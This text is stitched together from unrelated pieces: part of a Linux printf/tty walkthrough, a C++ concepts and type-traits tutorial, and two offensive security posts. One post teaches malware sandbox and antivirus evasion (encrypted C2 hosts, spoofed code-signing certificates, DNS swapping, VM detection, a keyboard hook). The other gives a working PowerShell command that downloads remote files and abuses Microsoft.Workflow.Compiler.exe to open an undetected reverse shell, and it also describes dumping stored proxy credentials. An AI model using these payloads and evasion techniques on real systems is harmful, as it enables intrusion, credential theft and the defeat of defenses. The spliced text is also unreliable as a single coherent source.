7)+10.288 us |      }
7)           |      tty_wakeup() 
7)+14.687 us |  } /* pty_write */
...

The pty_write() function invokes tty_* operations, which we assume moves ‘Hello World 1’ to the console. So where is this console?


Step 10 — Console output buffer is updated

Goal: Put the string to the console attached to stdout

The first argument to pty_write is struct tty_struct *tty. This struct contains the console, which is created with each unique tty process. In this case, the parent terminal created the pts/0 console and each child simply points to it.

The tty has many interesting parts to look at: line discipline, driver operations, the tty buffer(s), the tty_port. In the interest of space, I’m not going to cover tty initialization since it’s not on the direct path for printf — the process was created, the tty exists, and it wants this ‘Hello World 1’ right now!

The string is copied to the input queue in tty_insert_flip_string_fixed_flag().

memcpy(tb->char_buf_ptr + tb->used, chars, space); 
memset(tb->flag_buf_ptr + tb->used, flag, space);
tb->used += space;
copied += space;
chars += space;

This moves the data and flags to the current flip buffer. The console state is updated and the buffer is pushed:

if (port->low_latency)
    flush_to_ldisc(&buf->work);
else
    schedule_work(&buf->work);

Then the line discipline is notified to add the new string to the output window in tty_wakeup(). The typical case involves a kernel work queue, which is necessarily asynchronous. The string is waiting in the buffer with the signal to go. Now it’s up to the PT master to process it.
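If the copy step in tty_insert_flip_string_fixed_flag() feels abstract, a toy user-space model may help. This is not kernel code: ToyFlipBuffer and insert_fixed_flag are names I made up, the buffer is a single fixed array, and there is no locking or work queue. It only mirrors the memcpy/memset/used bookkeeping shown above.

```cpp
// Toy user-space model of the copy step, NOT kernel code.
// ToyFlipBuffer and insert_fixed_flag are hypothetical names for illustration.
#include <algorithm>  // std::min
#include <array>
#include <cstddef>
#include <cstring>    // std::memcpy, std::memset

struct ToyFlipBuffer {
    std::array<char, 64> chars{};           // stands in for char_buf_ptr
    std::array<unsigned char, 64> flags{};  // stands in for flag_buf_ptr
    std::size_t used = 0;                   // bytes already queued
};

// Copies as much of `text` as fits and tags every copied byte with the same flag.
// Returns the number of bytes actually copied.
std::size_t insert_fixed_flag(ToyFlipBuffer& tb, const char* text,
                              std::size_t length, unsigned char flag) {
    const std::size_t space = std::min(length, tb.chars.size() - tb.used);
    std::memcpy(tb.chars.data() + tb.used, text, space);
    std::memset(tb.flags.data() + tb.used, flag, space);
    tb.used += space;
    return space;
}
```

The real function asks the tty layer for more buffer room and loops until the whole string is queued; the toy version simply stops when its one array is full.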

Our master is gnome-terminal, which manages the window context we see on screen. The buffer will eventually stream to the console on the kernel’s schedule. In a native console (not X server), this would be a segment of raw video memory. Once the pty master processes the new data…


Step 11 — Hello world!

Goal: Rejoice

$ ./printf1_s
Hello World 1

$

Success!
Now you know how it works on my system. How about yours?


FAQ

Why did you put this article together?
Recently, I was asked about how some functions are implemented several times over a short period and I couldn’t find a satisfactory resource to point to. Many blog posts focused too much on digging through byzantine compiler source code. I found that approach unhelpful because the compiler and standard library are only one part of the problem. This system-wide approach gives beginners a foundation, a path to follow, and helpful experiments to adapt to their own use.

What did you leave out?
Too much! It’ll have to wait until ‘printf() in 2500 seconds’. In no particular order:

  • Details about how glibc implements buffering
  • Details of how the GNOME console manages the terminal context
  • Flip buffer mechanics for ttys (similar to video backbuffers)
  • More about Linux work queues used in the tty driver
  • More discussion of how this process varies among architectures
  • Last (and definitely least): Untangling the mess inside vfprintf

How did you get gdb to print out that trace in step 6?
I used a separate file for automating gdb input and captured the output to another file.

$ cat gdbcmds
start
stepi
stepi
stepi
stepi
...about 1000 more stepi...

$ gdb printf1_s -x gdbcmds > printf1_s_dump

Malware on Steroids Part 3: Machine Learning & Sandbox Evasion

 

( Original text by Paranoid Ninja )

It’s been a busy month for me and I was not able to save time to write the final part of the series on Malware Development. But I am receiving too many DMs on Twitter accounts lately to publish the final part. So here we are.

If you are reading this blog, I am basically assuming that you know C/C++ and Windows API by now. If you don’t, then you should go back and read my other blogs on Static AV Evasion and Malware Development using WINAPI (basics).

In this post, we will be using multiple ways to evade endpoint detection mechanisms and sandboxes. Machine Learning is applied at two major levels in most organization. One is at the network level where it tries to identify anomalies based on the behavior of network connections, proxy logs and pattern of connections over time. Most Network ML Solutions tend to analyze beacons of malwares and DPI (deep packet inspection) to identify the malware. This is something that Microsoft ATA (Advanced Threat Analytics), or FireEye sandboxes do. On the other hand, we have Endpoint agents like Symantec EP, Crowdstrike, Endgame, Microsoft Cloud Defender and similar monitoring tools which perform behavioral analysis of the code along with signature detection to detect malicious processes.

I will purely be focusing on multiple ways where we can make our malware behave like a legitimate executable or try to confuse the Endpoint agent to evade detection. I’ve used the methods mentioned in this blog to successfully evade Crowdstrike Agent, Symantec EP and Microsoft Windows Cloud Defender, the videos of the latter which I have already posted in my previous blogs. However, you might need to modify or add new techniques as this might become detectable over time. One of the best ways to avoid AV is to disable the Process creation altogether and just use WINAPI. But that would mean carefully crafting your payloads and it would be difficult to port them for shellcoding. That’s the main reason malware authors write their malwares in C, and only selected payloads in shellcode. A combination of these two makes malwares unbeatable on all fronts.

Each of the techniques mentioned below creates a unique signature which most AVs won’t have. It’s more a matter of trial and error to check which AVs detect which techniques. Also remember that we can use stubs and packers for encryption, but that’s for a different blog post that I will do later.

P.S.: This blog is exclusive of shellcodes, reason being I will be writing a separate blog series on windows Shellcoding later. I will be using encrypted functions during the shellcoding part and not in this post. This post is specifically how Malware authors use C to perform evasions. You can also use the same APIs and code snippets mentioned below to craft a custom malware for Red Teaming.

main():

So, before we start let’s try to get a based understanding of how Machine learning works. Machine learning is purely focused on the behaviour of the user (in case of endpoints). In short, if we sign our malware and try to make it act like a legitimate executable, it becomes really easy to evade ML. I’ve seen people using PowerShell to write reverse shells, but they get easy detectable due to Microsoft’s AMSI (Anti-Malware Scan Interface) which consistently keeps on checking (including and mainly PowerShell) to detect malicious process executions and connections.  For those of you who don’t know, Microsoft uses DMTK(Microsoft Distributed Machine Learning Toolkit) framework which is basically a decision tree based algorithm which specifies whether a file is malicious or not. PowerShell is very tightly controlled by Microsoft and it gets harder over time to evade ML when using PowerShell.

This is the reason I decided to switch to C and C++ to get reverse shells over network so that I could have flexibility at a lower level to do whatever I want. We will be using a lot of windows APIs, encrypted variables and a lot of decision tree of our own to evade ML. This it supposed to work till Microsoft doesn’t start using CNTK framework which is a much better framework than DMTK, but harder to apply at the same time.

Encrypted Host & Process Names

So, the first thing to do is to encrypt our hostname. We can possibly use something as simple as XOR, or any custom complicated mathematical equation to decrypt our encrypted variable to get the hostname. I created a python script which takes a hostname and a character and returns a Xor’d Array:

As you can see, it gives the Key value in integer of the Xor Key, the length of the encrypted array and the whole Encrypted array which we can simply use in a C integer or char array.

The next step is to decrypt this array at runtime and we need to hardcode the key inside the executable. This is the only key that we would be hardcoding into the code. Also, to make it complicated for the reverse engineer, we will write a C function to automatically detect that the last integer is the key and use that to loop through the array to decrypt the encrypted string. Below is how it would look like

So, we are creating a char buffer of the size of EncryptedHost on heap. We are then passing the host, length and decrypted host variable to the Decrypter function. Below is how the Decrypter function looks:

To explain in short, it creates an Encrypted Integer array of our char array  and xors them back again using the key to convert the encrypted value to the original value and stores them in the DecryptedData array we created previously. With the help of this, if someone runs strings, they wouldn’t be able to see any host in the executable. They would need to understand the math and set a proper breakpoint in Debugger to fetch the C2 host. You can create more complicated mathematical equations to decrypt host if required. We can now use this DecryptedData array within our sockets to connect to the remote host.

P.S.: Reverse Engineers & Sandboxes can fetch the C2 names with the help of packet captures and DNS Name Resolutions. It is better to send raw packets to multiple hosts to confuse which one is the real C2 server. But at the same time, this can lead to easy  detection of the malware. Check my Legitimate Domain Routing technique below which is much better than using this.

If you’ve read my previous post, then you know that I created a cmd.exe process using the CreateProcessW winAPI. We can do what we did above for Creating Processes as well. But instead of hardcoding the Encrypted array for the Process to be executed, we will send the process name as an array over network once the executable connects to the C2 Server along with the host. We can also use authentication on C2 server, and only allow it to connect if it sends a proper key. Below is the Code for Creating Processes using Encrypted Char array over sockets

In this way, when a system sandboxes our executable, it won’t know that what process are we executing beforehand inside a sandbox. Below is a much clearer description of what we are doing:

  1. Decrypt C2 host at runtime and connect to host
  2. Receive password and verify if it is right
  3. If the key is right, wait for 5 seconds to receive encrypted array(process name) over socket
  4. Decrypt the received Process and run it using CreateProcessW API

With the help of the above technique, if our C2 is down, then the sandbox/analyst will not be able to find what we are executing since we have not hardcoded any processes to execute.

Code Signing with Spoofed Certs

I wrote a Script in python which can fetch and create duplicate certificates from any website which we can use for code signing. One thing I noticed is that Antiviruses don’t check and verify the whole chain of the certificate. They don’t even verify the authenticity. The main reason being not every antivirus can connect to internet in every organization to fetch and verify the ceritificates for every third party application installed. You can find the Certificate spoofing python script on my GitHub profile here.

And this is the scan results of Windows ML Defender after Signing:

Next thing is we will try to add a few features to our malware to detect if we are running in a sandbox or inside a virtual machine. We will try to evade Sandboxes as much as possible and kill our executable as soon as we find anything suspicious. We need to make sure that our malware doesn’t even look suspicious. Because if it does, then the sandbox will quarantine it and send an alert that there is a suspicious process running. This is worse than detection because this is where most SOC detects the malware and the Red Teaming gets detected.

Legitimate Domain Routing (Evade Proxy Categorization Detection and Endpoint Detection)

This is one of the best techniques I’ve found out till date which almost works every time. Let’s say I buy a C2 domain named abc.com. I will modify the A records so that it points to Microsoft.com or some similar legitimate site for a month or so. When the malware executes on the vicim’s system, it will connect to this domain which will send a normal HTTP reply from Microsoft and the malware will go to sleep for a few hours and then loop into doing the same thing. Now whenever I want to get a reverse shell of my malware, I will simply change the A records of abc.com to my C2 hosting server and it will send a key in HTTP to the malware which will trigger it to fetch shellcode or send a shell back to my C2. This way, our abc.com will also get categorized as a legitimate domain instead of malicious or phishing site. And even the Endpoint systems will not block it since it is contacting a legitimate domain. Over time I’ve also used Symantec’s website to connect as a temporary domain, later changing it to my malicious C2 server.

Check System Uptime & Idletime (Evades Virtual Machine Sandboxes)

If our executable is running in a virtual machine, the uptime will be pretty short since it will boot up, perform analysis on our binary and then shutdown. So, we can check the uptime of the machine and sleep till it reaches 20-30 minutes and then run it. Make sure to use NTP to check the time with external domain, else Sandboxes can fast-forward system time for process executions. Checking via NTP will make sure that correct time is checked. Below is the code to check uptime of a system and also idle time in case required.

Idletime:

Uptime:

Check Mac Address of Virtual Machine (Known OUIs)

Vmware, Virtual box, MS Hyper-v and a lot of virtual machine providers use a fixed MAC Unique identifier which can be used to run in a loop to check if current mac address matches to any of those mentioned in the list. If it is, then it is highly possible that the malware is running in a virtual environment, mostly for the purpose of sandboxing and reverse engineering. Below are the OUIs that I know for the moment. If there are more, do let me know in the comments.

Company and Products MAC unique identifier (s)
VMware ESX 3, Server, Workstation, Player 00-50-56, 00-0C-29, 00-05-69
Microsoft Hyper-V, Virtual Server, Virtual PC 00-03-FF
Parallels Desktop, Workstation, Server, Virtuozzo 00-1C-42
Virtual Iron 4 00-0F-4B
Red Hat Xen 00-16-3E
Oracle VM 00-16-3E
XenSource 00-16-3E
Novell Xen 00-16-3E
Sun xVM VirtualBox 08-00-27

Below is the C code to detect mac address of a Windows machine:

Execute shellcode when a specific key is pressed. (Sleep & hook method)

Here, we are only executing our shellcode/malicious process when the user presses a specific key. For this, we can hook the keyboard and create a list of multiple keys that specify what kind of shellcode needs to be executed. This is basically polymorphism. Every time a different shellcode depending on the key will confuse the Antivirus, and secondly in a sandbox, no one presses any key. So, our malware won’t execute in a sandbox. Below is the Code to hook the keyboard and check the key pressed.

P.S.: Below code can also be used for Keylogging 😉

Check number of files in Temp and Recent Files

Whenever a malware is running in a sandbox, the sandbox will have the minimum number of recent files in the virtual machine reason being sandboxes are not used for usual work. So, we can run a loop to check the number of recent files and also files in temp directory to check if we are running in a virtual machine. If the number of recent files are less than 10-15, just sleep or suspend itself. Below is a code I wrote which loops to check all files and folders in a directory:

Now I can keep on going like this, but the blog will just get lengthier with this. Besides, below are a few things you can code to check if we are running in a sandbox:

  1. Check if the hard disk size is greater than 60 GB (Default Virtual Machine Sandbox Size is <100GB)
  2. Check if Packet Capture Driver is installed in the registry (To check if Wireshark or similar is running for packet analysis)
  3. Check if Virtual Box additions/extension pack is installed
  4. WannaCry DNS Sinkhole Method

This is another method which WannaCry used. So basically, the malware will try to connect to a domain that doesn’t exist. If it does, it means the malware is running in a sandbox, since Sandboxes will reply to a NX Domain too to check if that’s a C2 Server. If we get a NX domain in reply, then we can directly connect to the C2 host. BEWARE, that DNS Sinkholes can prevent your malware from executing at all. Instead you can buy a certain domain and check for a customized response to check if you are running in a sandbox environment.

Now, there are much more different ways to evade ML and AV detection and they aren’t really that hard. Evading ML based AVs are not rocket science as people say. It’s just that it requires more of free time to sit and understand how the underlying architecture works and find flaws to evade it.

It’s much better to invest in a highly technical Threat Hunter for detecting suspicious behaviors in your environment and logs rather than buying a high-end Sandbox or Antivirus Solution, though the latter is also useful in its own way.

 

C++ Core Guidelines: Definition of Concepts, the Second


Let’s assume I have defined the is_contiguous trait. In this case, I can use it to distinguish a random access iterator RA_iter from a contiguous iterator Contiguous_iter.

template<typename I>    // iterator providing random access
concept bool RA_iter = ...;

template<typename I>    // iterator providing random access to contiguous data
concept bool Contiguous_iter =
    RA_iter<I> && is_contiguous<I>::value;  // using is_contiguous trait
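The is_contiguous trait is only assumed here; it is not part of the standard library. As a minimal sketch of what such a hand-written trait might look like (my assumption, not the guidelines' definition), it could default to false and be switched on for raw pointers:

```cpp
// Sketch of a hand-written is_contiguous trait (hypothetical; not in the standard library).
#include <type_traits>

// Primary template: an iterator type is not treated as contiguous unless stated otherwise.
template <typename I>
struct is_contiguous : std::false_type {};

// Raw pointers always walk contiguous memory.
template <typename T>
struct is_contiguous<T*> : std::true_type {};

static_assert(is_contiguous<int*>::value, "pointers are contiguous");
static_assert(!is_contiguous<int>::value, "everything else defaults to false");
```

Class-type iterators, such as the ones std::vector hands out on many implementations, would need their own specializations before this trait reports true for them.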

 

I can even wrap a tag class such as is_contiguous into a concept and use it. Now, I have a more straightforward expression of the idea of a contiguous iterator, Contiguous_iter.

template<typename I> concept Contiguous = is_contiguous<I>::value;

template<typename I>
concept bool Contiguous_iter = RA_iter<I> && Contiguous<I>;

 

Okay, let me first explain two key terms: traits and tag dispatching.

Traits

Traits are class templates which extract properties from a generic type.

The following program shows, for each of the 14 primary type categories of the type-traits library, a type which satisfies that trait. The primary type categories are complete and don’t overlap, so each type is a member of exactly one type category. If you check a type category for your type, the result is independent of the const or volatile qualifiers.

// traitsPrimary.cpp

#include <iostream>
#include <string>
#include <type_traits>

using namespace std;

template <typename T>
void getPrimaryTypeCategory(){

  cout << boolalpha << endl;

  cout << "is_void<T>::value: " << is_void<T>::value << endl;
  cout << "is_integral<T>::value: " << is_integral<T>::value << endl;
  cout << "is_floating_point<T>::value: " << is_floating_point<T>::value << endl;
  cout << "is_array<T>::value: " << is_array<T>::value << endl;
  cout << "is_pointer<T>::value: " << is_pointer<T>::value << endl;
  cout << "is_reference<T>::value: " << is_reference<T>::value << endl;
  cout << "is_member_object_pointer<T>::value: " << is_member_object_pointer<T>::value << endl;
  cout << "is_member_function_pointer<T>::value: " << is_member_function_pointer<T>::value << endl;
  cout << "is_enum<T>::value: " << is_enum<T>::value << endl;
  cout << "is_union<T>::value: " << is_union<T>::value << endl;
  cout << "is_class<T>::value: " << is_class<T>::value << endl;
  cout << "is_function<T>::value: " << is_function<T>::value << endl;
  cout << "is_lvalue_reference<T>::value: " << is_lvalue_reference<T>::value << endl;
  cout << "is_rvalue_reference<T>::value: " << is_rvalue_reference<T>::value << endl;

  cout << endl;

}

int main(){
    
    getPrimaryTypeCategory<void>();              // (1)
    getPrimaryTypeCategory<short>();             // (1)
    getPrimaryTypeCategory<double>();
    getPrimaryTypeCategory<int []>();
    getPrimaryTypeCategory<int*>();
    getPrimaryTypeCategory<int&>();
    struct A{
        int a;
        int f(double){return 2011;}
    };
    getPrimaryTypeCategory<int A::*>();
    getPrimaryTypeCategory<int (A::*)(double)>();
    enum E{
        e= 1,
    };
    getPrimaryTypeCategory<E>();
    union U{
      int u;
    };
    getPrimaryTypeCategory<U>();
    getPrimaryTypeCategory<string>();
    getPrimaryTypeCategory<int * (double)>();
    getPrimaryTypeCategory<int&>();              // (2)         
    getPrimaryTypeCategory<int&&>();             // (2)
    
}

 

I don’t want to bore you to death. Therefore, there is only the output of the lines (1).

traitsPrimary1

And here is the output of the lines (2).

traitsPrimary2

Tag Dispatching

Tag dispatching lets you choose a function based on the properties of its types. The decision takes place at compile time, and it uses the traits which I explained in the previous section.

A typical example of tag dispatching is the std::advance algorithm from the Standard Template Library. std::advance(it, n) increments the iterator it by n elements. The program shows you the key idea.

 

// advanceTagDispatch.cpp

#include <iterator>
#include <forward_list>
#include <list>
#include <vector>
#include <iostream>

template <typename InputIterator, typename Distance>
void advance_impl(InputIterator& i, Distance n, std::input_iterator_tag) {
    std::cout << "InputIterator used" << std::endl;
    while (n--) ++i;
}

template <typename BidirectionalIterator, typename Distance>
void advance_impl(BidirectionalIterator& i, Distance n, std::bidirectional_iterator_tag) {
    std::cout << "BidirectionalIterator used" << std::endl;
    if (n >= 0) 
        while (n--) ++i;
    else 
        while (n++) --i;
}

template <typename RandomAccessIterator, typename Distance>
void advance_impl(RandomAccessIterator& i, Distance n, std::random_access_iterator_tag) {
    std::cout << "RandomAccessIterator used" << std::endl;
    i += n;
}

template <typename InputIterator, typename Distance>
void advance_(InputIterator& i, Distance n) {
    typename std::iterator_traits<InputIterator>::iterator_category category;    // (1)
    advance_impl(i, n, category);                                                // (2)
}
  
int main(){
    
    std::cout << std::endl;
    
    std::vector<int> myVec{0, 1, 2, 3, 4, 5, 6, 7, 8, 9};
    auto myVecIt = myVec.begin();                                                // (3)
    std::cout << "*myVecIt: " << *myVecIt << std::endl;
    advance_(myVecIt, 5);
    std::cout << "*myVecIt: " << *myVecIt << std::endl;
    
    std::cout << std::endl;
    
    std::list<int> myList{0, 1, 2, 3, 4, 5, 6, 7, 8, 9};
    auto myListIt = myList.begin();                                              // (4)
    std::cout << "*myListIt: " << *myListIt << std::endl;
    advance_(myListIt, 5);
    std::cout << "*myListIt: " << *myListIt << std::endl;
    
    std::cout << std::endl;
    
    std::forward_list<int> myForwardList{0, 1, 2, 3, 4, 5, 6, 7, 8, 9};
    auto myForwardListIt = myForwardList.begin();                                // (5)
    std::cout << "*myForwardListIt: " << *myForwardListIt << std::endl;
    advance_(myForwardListIt, 5);
    std::cout << "*myForwardListIt: " << *myForwardListIt << std::endl;
    
    std::cout << std::endl;
    
}

 

The expression typename std::iterator_traits<InputIterator>::iterator_category category in line (1) determines the iterator category at compile time. Based on the iterator category, the most specific overload of the function advance_impl(i, n, category) is used in line (2). Each container returns an iterator of the iterator category which corresponds to its structure. Therefore, line (3) gives a random access iterator, line (4) gives a bidirectional iterator, and line (5) gives a forward iterator which is also an input iterator.

advanceTagDispatch

From the performance point of view, this distinction makes a lot of sense because a random access iterator can be incremented faster than a bidirectional iterator, and a bidirectional iterator can be incremented faster than an input iterator. From the user’s perspective, you invoke std::advance(it, 5) and you get the fastest version which your container satisfies.

This was quite verbose. I don’t have much to add to the two remaining rules.

T.25: Avoid complementary constraints

The example from the guidelines shows complementary constraints.

template<typename T> 
    requires (!C<T>) // bad
void f(); 

template<typename T> 
    requires C<T> 
void f();

Avoid it. Make an unconstrained template and a constrained template instead.

 

template<typename T>   // general template
    void f();

template<typename T>   // specialization by concept
    requires C<T>
void f();

 

You can even set the unconstrained version to delete so that only the constrained versions are usable.

template<typename T>
void f() = delete;

 

T.26: Prefer to define concepts in terms of use-patterns rather than simple syntax

The title for this guideline is quite vague, but the example is self-explanatory.

Instead of using the concepts has_equal and has_not_equal to define the concept Equality

template<typename T> concept Equality = has_equal<T> && has_not_equal<T>;

 

use the usage-pattern. This is more readable than the previous version:

template<typename T> concept Equality = requires(T a, T b) {
    { a == b } -> std::same_as<bool>;   // C++20 spelling; std::same_as lives in <concepts>
    { a != b } -> std::same_as<bool>;
    // axiom { !(a == b) == (a != b) }
    // axiom { a = b; => a == b }  // => means "implies"
};

 

The concept Equality requires in this case that you can apply == and != to the arguments and both operations return bool.

What’s next?

Here is a part of the opening from the C++ core guidelines to template interfaces: «…the interface to a template is a critical concept — a contract between a user and an implementer — and should be carefully designed.». You see, the next post is critical.

 

 

Thanks a lot to my Patreon Supporters: Eric Pederson, Paul Baxter,  Meeting C++, Matt Braun, Avi Lachmish, Roman Postanciuc, Venkata Ramesh Gudpati, Tobias Zindl, Mielo, Dilettant, and Marko.

Thanks in particular to: TakeUpCode

Undetectable C# & C++ Reverse Shells

Index Attacks list:

  1. Open a simple reverse shell on a target machine using C# code and bypassing AV solutions.
  2. Open a reverse shell with a little bit of persistence on a target machine using C++ code and bypassing AV solutions.
  3. Open C# Reverse Shell via Internet using Proxy Credentials.
  4. Open Reverse Shell via C# on-the-fly compiling with Microsoft.Workflow.Compiler.exe.
  5. Open Reverse Shell via PowerShell & C# live compiling
  6. Open Reverse Shell via Excel Macro, PowerShell and C# live compiling

C# Simple Reverse Shell Code writing

Looking on github there are many examples of C# code that open reverse shells via cmd.exe. In this case i copied part of the codes and used the following simple C# program. No evasion, no persistence, no hiding code, only simple “open socket and launch the cmd.exe on victim machine”:

Simple Reverse shell C# code

Source code link: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc

Kali Linux in listening mode

I put my kali in listening mode on 443 port with netcat, compiled and executed my code.

Scan the exe file with no Threats found

As you can see the .exe file is clean for Windows Defender. From AV side no malicious actions ware already performed. This could be a standard results.

file execution on victim machine

Executing file the cmd instance is visible to the user and if the prompt window will be closed the same will happen for the shell.

Running reconnaissance commands on victim machine from Kali Linux

Running the exe file will spawn immediately the shell on my Kali.

VIRUS TOTAL RESULT

https://www.virustotal.com/#/file/983fe1c7d4cb293d072fcf11f8048058c458a928cbb9169c149b721082cf70aa/detection

C++ Reverse Shell with a little bit of persistence

Digging deeper, I found several C++ programs with the same goal as the reverse shell above, but one caught my attention. In particular, I found @NinjaParanoid’s code, which opens a reverse shell with a little bit of persistence. Some details of the code follow. For all the details, go to the original article.

This script has 3 main advantages:

  • while loop that try to reconnect after 5 seconds
  • invisible cmd instance
  • takes arguments if standard attackers ip change
while loop that wait 5 seconds before running
main details
Windows Defender .exe scan

After compiling the code I analyzed it with Windows Defender and no threats were detected. At this time the exe behavior begins to be a bit borderline between malicious and non. As you can imagine as soon as you run the file the shell will be opened after 5 seconds in “silent mode”.

view from attacker’s machine

From user side nothing appears on screen. There is only the background process that automatically reconnects to the Kali every 5 sec if something goes wrong.

view from victim’s machine

VIRUS TOTAL RESULT

VT result

https://www.virustotal.com/#/file/a7592a117d2ebc07b0065a6a9cd8fb186f7374fae5806a24b5bcccd665a0dc07/detection

Open C# Reverse Shell via Internet using Proxy Credentials

Thinking about how to use proxy credentials to open a reverse shell to the internet from inside a company network, I developed code that performs these steps:

  • use the peewpw script to dump the proxy credentials (if present) from Credential Manager without admin privileges
  • encode the dumped credentials in Base64
  • insert them into the proxy authorization for the connection.

… and that’s it…

Part of WCMDump code
code related to the proxy connection

…before compiling the code you only need the proxy IP/port of the targeted company. For security reasons I cannot share the source code, to avoid in-the-wild exploitation, but if you have a little programming skill you can write the whole chain of steps yourself. Obviously this attack has a very high failure rate, because the victim may not have saved the domain credentials in Credential Manager, which makes the attack ineffective.

Also in this case no threats were detected by Windows Defender and other enterprise AV solutions.

Thanks to @SocketReve for helping me to write this code.

Open Reverse Shell via C# on-the-fly compiling with Microsoft.Workflow.Compiler.exe

Moving on and looking deeper, I found several articles that talk about arbitrary, unsigned code execution in Microsoft.Workflow.Compiler.exe. Here are the articles: 1, 2, 3.

As a result of these articles I thought … why not use this technique to open my reverse shell written in C#?

In short, the articles talk about how to abuse the Microsoft.Workflow.Compiler.exe utility in order to compile C# code on-the-fly. Here is an example command:

standard Microsoft.Workflow.Compiler.exe command line

The REV.txt file must have the following XOML structure:

REV.txt XOML code

Below you will find the raw structure of the C# code that will be compiled (the same as the C# reverse shell code described above):

Rev.Shell code

After running the command, the following happens:

  1. Not fileless: the C# source code is fetched from the Rev.Shell file.
  2. Fileless: the C# payload is compiled and executed.
  3. Fileless: the payload opens the reverse shell.

Kali listening on port 443
Some commands executed from the attacker's machine on the victim machine

Open Reverse Shell via PowerShell & C# live compiling

At this point I thought … what could be the next step to evolve this attack into something more usable in a red team engagement or in a real attack?

Easy… to give Microsoft.Workflow.Compiler.exe the files to compile, why not use PowerShell? …and here we are:

powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
prompt command line on a victim machine

With this command PowerShell downloads the two files described above and saves them on the file system. Immediately afterwards it abuses Microsoft.Workflow.Compiler.exe to compile the C# code live and open the reverse shell. The gist links follow:

PowerShell Commands: https://gist.githubusercontent.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f/raw/7806b5c9642bdf39365c679addb28b6d19f31d76/PowerShell_Command.txt

REV.txt code — Rev.Shell code

Once the PowerShell command is launched, the reverse shell opens without any detection.

Attacker view

Open Reverse Shell via Excel Macro, PowerShell and C# live compiling

As the last step of this series of attacks I tried inserting the PowerShell code just described into a macro … and guess what?

The file is not detected as malicious and the reverse shell is opened without any alert.

Macro’s code
Scan result
Reverse shell on a victim machine

VIRUS TOTAL RESULT

https://www.virustotal.com/#/file/e81fe80f61a276d216c726e34ab0defc6e11fa6c333c87ec5c260f0018de89b4/detection

Many of the detections concern the macro that launches PowerShell, not its actual behavior. This means that if an attacker were able to obfuscate the code to avoid detection, or used another service to download the two files, they could open a reverse shell as shown above without being detected.

Conclusion

By opening several reverse shells written in different ways, this article aims to show that actions on the border between good and evil are rarely detected by the antivirus products on the market. The first 2 shells are completely undetectable by all the AV on the market. The signatures related to the malicious macro concern only generic PowerShell and not the real abuse of Microsoft services.

Critically, the arbitrary code execution technique using Microsoft.Workflow.Compiler.exe relies only on the ability to call a command, not on PowerShell. There is no need for the attacker to use some known PowerShell technique that might be detected and blocked by a security solution in place. You gain benefits such as bypassing application whitelisting and new ways of obfuscating malicious behavior. That said, when abusing Microsoft.Workflow.Compiler.exe, a temporary DLL will be created and may be detected by anti-virus.
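From the defender's side, the invocation pattern shown in this article (Microsoft.Workflow.Compiler.exe called with two file arguments) is something that can be looked for in process command-line logs. The snippet below is only a minimal sketch of that idea, assuming the command lines are available as plain strings. The function name and the regular expression are my own illustrative choices, not part of any security product, and a renamed or copied binary would not be caught by it.

```python
import re

# Hypothetical heuristic: match Microsoft.Workflow.Compiler.exe followed by
# two whitespace-separated arguments, the pattern used in this article.
# This is an assumption-based sketch, not a complete detection rule.
_WORKFLOW_COMPILER = re.compile(
    r'microsoft\.workflow\.compiler\.exe"?\s+\S+\s+\S+',
    re.IGNORECASE,
)


def looks_like_workflow_compiler_run(command_line: str) -> bool:
    """Return True if the command line runs the compiler with two arguments."""
    return _WORKFLOW_COMPILER.search(command_line) is not None


if __name__ == "__main__":
    sample = (
        r"C:\Windows\Microsoft.Net\Framework64\v4.0.30319"
        r"\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell"
    )
    print(looks_like_workflow_compiler_run(sample))
    print(looks_like_workflow_compiler_run("notepad.exe notes.txt"))
```

Since this executable is rarely needed on ordinary workstations, any match is usually worth a closer look, but that is a judgment call that depends on the environment.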